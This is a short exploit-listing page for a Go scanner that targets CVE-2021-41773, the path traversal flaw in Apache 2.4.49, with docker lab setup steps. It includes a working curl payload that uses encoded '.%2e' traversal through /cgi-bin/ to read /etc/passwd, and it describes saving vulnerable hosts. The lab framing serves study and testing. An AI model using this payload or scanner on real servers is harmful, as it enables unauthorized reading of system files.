Share
## https://sploitus.com/exploit?id=5A54F5DA-F9C1-508B-AD2D-3E45CD647D31
# Scanner-CVE-2021-41773
### A automatic scanner to apache 2.4.49
<pre>
โ€ข run: go run main.go  OR  go build main.go && ./main
โ€ข you can customize your payload
โ€ข vulnerable hosts are saved
</pre><hr>

![image](https://user-images.githubusercontent.com/77762068/138774460-4fe76efc-7f43-4a32-b870-8092f987daa8.png)

<pre>
Make your lab:
1. Pull Image: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
2. Run Image: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
3. Exploit: curl -v "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
</pre>